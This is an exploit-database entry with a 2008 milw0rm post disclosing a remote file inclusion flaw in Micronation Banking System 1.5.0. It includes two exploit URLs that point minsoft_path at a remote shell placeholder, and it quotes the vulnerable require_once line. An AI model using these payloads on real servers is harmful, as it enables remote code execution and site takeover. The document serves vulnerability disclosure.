Micronation Banking System(minba) 1.5.0 Remote File Inclusion Vulnerability

vendor:

Micronation Banking System(minba)

by:

DaRkLiFe

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Micronation Banking System(minba)

Affected Version From: 1.5.2000

Affected Version To: 1.5.2000

Patch Exists: NO

Related CWE: N/A

CPE: a:minbank:minba

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Micronation Banking System(minba) 1.5.0 Remote File Inclusion Vulnerability

Multiple files in Micronation Banking System(minba) 1.5.0 are vulnerable to Remote File Inclusion. An example of vulnerable code is line 3 of minba/utility/utgn_message.php file which contains require_once("$minsoft_path/utility/utgn_config.php");

Mitigation:

Input validation should be used to prevent Remote File Inclusion attacks.

Source

Exploit-DB raw data:

**************************************************************************************

Author : By DaRkLiFe
Greetz : str0ke & S.VV.A.T.

**************************************************************************************
Script   :
Micronation Banking System(minba) 1.5.0
Remote File Inclusion Vulnerability(s)

Download:
http://downloads.sourceforge.net/minbank/minba_v0150.zip?modtime=1169500084&big_mirror=0

**************************************************************************************

Exploit : http://site.com/minba/utility/utdb_access.php?minsoft_path=Shellz?


http://site.com/minba/utility/utgn_message.php?minsoft_path=Shellz?

**************************************************************************************

In Multiple files the vulnerability exists.

I have posted two examples

Vulberable : line 3 : require_once("$minsoft_path/utility/utgn_config.php");
in minba/utility/utgn_message.php file


**************************************************************************************

THANKS ! GREETZ !
**************************************************************************************

# milw0rm.com [2008-09-30]